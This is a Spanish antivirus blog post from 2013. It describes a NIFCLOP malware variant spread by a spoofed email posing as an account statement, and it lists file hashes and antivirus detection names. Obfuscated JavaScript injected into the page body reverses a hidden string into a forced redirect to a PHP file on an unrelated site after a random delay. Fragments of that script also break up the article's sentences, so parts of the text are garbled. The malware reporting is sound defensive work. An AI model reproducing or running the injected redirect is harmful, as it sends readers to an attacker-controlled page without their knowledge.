NUEVA VARIANTE DE MALWARE NIFCLOP que se recibe por mail
Desde Lima (Perú) nos llega para analizar este fichero que aparenta ser un informe de nombre “ESTADO DE CUENTAS” y que pasamos a controlar a partir del ELISTARA 28.25 de hoy
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toriovirus.com/images/ministeriodetrabajo.jpg” width=”486″ height=”439″ /></p>
<p>Sobra decir que el remitente es falso, y no ha sido enviado por el ministerio de trabajo, sino que lo envian con dicho remitente utilizando tecnicas de spoofing</p>
<p>El preanalisis de virus<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
total ofrece este informe:
SHA256: 528d569fc87ea2b7d2ea511c70af509d7ea13803bf94ebd9f06e9c5ce1e68533
SHA1: 0ed415c320d5c136284ed7fa5138cec738c83085
MD5: cc6ceea0903673d55d760d60066f39af
Tamaño: 115.3 KB ( 118115 bytes )
Nombre: CTS Estado de Cuentas.scr
Tipo: Win32 EXE
Detecciones: 32 / 46
Fecha de análisis: 2013-08-30 11:02:22 UTC ( hace 0 minutos )
1 2 Más detalles Análisis File detail Información adicional Comentarios Votos
Antivirus Resultado Actualización
Agnitum Worm.Sdbot!vcLWJtnQb1s 20130829
AhnLab-V3 Backdoor/Win32.SdBot 20130829
AntiVir BDS/Bot.180122 20130830
Antiy-AVL Backdoor/Win32.Sdbot 20130830
Avast Win32:Malware-gen 20130830
AVG IRC/BackDoor.SdBot4.AENP 20130830
BitDefender Gen:Variant.Zusy.60628 20130830
ByteHero 20130829
CAT-QuickHeal 20130830
ClamAV 20130830
Commtouch 20130830
Comodo UnclassifiedMalware 20130830
DrWeb Trojan.DownLoader9.61135 20130830
Emsisoft Gen:Variant.Zusy.60628 (B) 20130830
ESET-NOD32 Win32/TrojanDownloader.VB.QEY 20130830
F-Prot 20130830
F-Secure Gen:Variant.Zusy.60628 20130830
Fortinet W32/SDBot.ZWN!tr.bdr 20130830
GData Gen:Variant.Zusy.60628 20130830
Ikarus Backdoor.Win32.SdBot 20130830
Jiangmin 20130830
K7AntiVirus Backdoor 20130830
K7GW Backdoor 20130830
Kaspersky Backdoor.Win32.Sdbot.zwn 20130830
Kingsoft 20130829
Malwarebytes Trojan.Agent.MSIL 20130830
McAfee Artemis!CC6CEEA09036 20130830
McAfee-GW-Edition Artemis!CC6CEEA09036 20130829
Microsoft Trojan:Win32/Malagent 20130830
MicroWorld-eScan Gen:Variant.Zusy.60628 20130830
NANO-Antivirus 20130830
Norman Troj_Generic.NRMUI 20130830
nProtect 20130830
Panda Generic Malware 20130830
PCTools 20130830
Rising 20130830
Sophos Mal/Generic-S 20130830
SUPERAntiSpyware 20130830
Symantec WS.Reputation.1 20130830
TheHacker Trojan/Downloader.VB.qfc 20130830
TotalDefense 20130829
TrendMicro TROJ_GEN.R0CBZ07HA13 20130830
TrendMicro-HouseCall TROJ_GEN.R0CBZ07HA13 20130830
VBA32 TScope.Trojan.VB 20130829
VIPRE Trojan.Win32.Generic!BT 20130830
ViRobot 20130830
Dicha version del ELISTARA 28.25 que lo detecta y elimina, estará disponible en nuestra web a partir de las 15 h CEST de hoy
saludos
ms, 30-8-2013
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.